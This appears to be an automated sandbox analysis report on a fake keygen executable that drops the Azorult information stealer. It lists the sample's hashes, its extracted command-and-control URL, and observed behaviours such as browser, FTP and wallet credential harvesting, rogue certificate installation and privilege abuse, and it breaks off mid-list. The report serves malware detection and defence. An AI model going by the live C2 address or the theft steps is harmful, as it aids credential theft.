Analysis
-
max time kernel
24s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-03-2021 08:55
Static task
static1
Behavioral task
behavioral1
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
Resource
win10v20201028
General
-
Target
S.A.D.Formatwandler.360.keygen.by.Lz0.exe
-
Size
5.2MB
-
MD5
d6b33a9f8b1600caa8b7ac88240e59e1
-
SHA1
19007187f24b11f922ed5ad8717c9e06f6452654
-
SHA256
3ee83cca83729705feabd39c7fd07a9f9f9de6a1847eea6f7ac645a60a643f85
-
SHA512
b8df0dbe55c0ed32639bab7af0a38077338b36fb4e4832d49e542cac9838f6359d3d0764cba4fcaa90ebb486e27efa8a461fe0fe637a94d0fa626a63847fcc04
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 12 IoCs
pid Process 2224 keygen-pr.exe 640 keygen-step-1.exe 3516 keygen-step-3.exe 1168 keygen-step-4.exe 1364 Setup.exe 2116 key.exe 3900 key.exe 3020 multitimer.exe 720 setups.exe 1844 askinstall20.exe 792 setups.tmp 4596 md2_2efs.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 792 setups.tmp 792 setups.tmp 792 setups.tmp 792 setups.tmp 792 setups.tmp 792 setups.tmp 792 setups.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/5268-227-0x0000000000400000-0x0000000000FE1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 104 ipinfo.io 108 ipinfo.io 123 api.ipify.org 146 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2116 set thread context of 3900 2116 key.exe 87 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 5752 4976 WerFault.exe 141 -
Kills process with taskkill 1 IoCs
pid Process 4236 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 45b43ac42622d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{52ABFB61-676E-4DA0-8D77-1A63A70E32EB} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e617d241106fbb5014d4a724135e99a78e9090e02795777655b3cc1f89d45e1a15fcd35f4fe1e2646b1e4536fea304c1a15f31074948dd92ab3a845ac25e41f7c1fdf86387fc31ba616cae7b25da25e6b75b6362c473e21cd55679fc552ac1223c3c9c440c61942fa9de9f0a0ba269bfa2a40b3fddb899582c280db23fd6252406d848b8b1aebbb8b0968831b39a1a4baa5a0778c5b653341dcea23c0003f31b8ff069435785782b03b352106d642121819dedace80d1f9d8f69706dcb516fc521a6421aac841c9f77555073659f49c4fb8d0e4ad35d7868291a437186603d9aaf18d6d1ab4cd25a4a9ca212eeeacd05834afd647d46c3c64cff046edfd0d6f72668b4de517e9a54d0a7391027e74077baf4815d5f689e4dbb398b6f70424e5c80b47be7d0b88f3cff989368983451ecbfab40603e63948bbde8eba44c54afae091ecbe21c9cdb22138e4516c273c40eb98fcba561d79a30562d9de724a7c29b98c4190bc6c8d19c65a9478530436f0087c0e98f78642bc31e266ca10ddbb9fe35c80a9d84dd8b899308655b8e43560ce85e09910baafee6e59001d6e4f77d6bf623584d6a18 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000006b3894de8361a76c25029d540ccc9ebd9b6aa159e79a711310e6a8c394707b44128d4a4e8803f9892b3cca9133f001f3b6e05c5803108f0f4adc MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2860 PING.EXE 4136 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 110 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 792 setups.tmp 792 setups.tmp 2116 key.exe 2116 key.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1364 Setup.exe Token: SeCreateTokenPrivilege 1844 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1844 askinstall20.exe Token: SeLockMemoryPrivilege 1844 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1844 askinstall20.exe Token: SeMachineAccountPrivilege 1844 askinstall20.exe Token: SeTcbPrivilege 1844 askinstall20.exe Token: SeSecurityPrivilege 1844 askinstall20.exe Token: SeTakeOwnershipPrivilege 1844 askinstall20.exe Token: SeLoadDriverPrivilege 1844 askinstall20.exe Token: SeSystemProfilePrivilege 1844 askinstall20.exe Token: SeSystemtimePrivilege 1844 askinstall20.exe Token: SeProfSingleProcessPrivilege 1844 askinstall20.exe Token: SeIncBasePriorityPrivilege 1844 askinstall20.exe Token: SeCreatePagefilePrivilege 1844 askinstall20.exe Token: SeCreatePermanentPrivilege 1844 askinstall20.exe Token: SeBackupPrivilege 1844 askinstall20.exe Token: SeRestorePrivilege 1844 askinstall20.exe Token: SeShutdownPrivilege 1844 askinstall20.exe Token: SeDebugPrivilege 1844 askinstall20.exe Token: SeAuditPrivilege 1844 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1844 askinstall20.exe Token: SeChangeNotifyPrivilege 1844 askinstall20.exe Token: SeRemoteShutdownPrivilege 1844 askinstall20.exe Token: SeUndockPrivilege 1844 askinstall20.exe Token: SeSyncAgentPrivilege 1844 askinstall20.exe Token: SeEnableDelegationPrivilege 1844 askinstall20.exe Token: SeManageVolumePrivilege 1844 askinstall20.exe Token: SeImpersonatePrivilege 1844 askinstall20.exe Token: SeCreateGlobalPrivilege 1844 askinstall20.exe Token: 31 1844 askinstall20.exe Token: 32 1844 askinstall20.exe Token: 33 1844 askinstall20.exe Token: 34 1844 askinstall20.exe Token: 35 1844 askinstall20.exe Token: SeDebugPrivilege 4236 taskkill.exe Token: SeDebugPrivilege 3020 multitimer.exe Token: SeDebugPrivilege 4408 MicrosoftEdge.exe Token: SeDebugPrivilege 4408 MicrosoftEdge.exe Token: SeDebugPrivilege 4408 MicrosoftEdge.exe Token: SeDebugPrivilege 4408 MicrosoftEdge.exe Token: SeImpersonatePrivilege 2116 key.exe Token: SeTcbPrivilege 2116 key.exe Token: SeChangeNotifyPrivilege 2116 key.exe Token: SeCreateTokenPrivilege 2116 key.exe Token: SeBackupPrivilege 2116 key.exe Token: SeRestorePrivilege 2116 key.exe Token: SeIncreaseQuotaPrivilege 2116 key.exe Token: 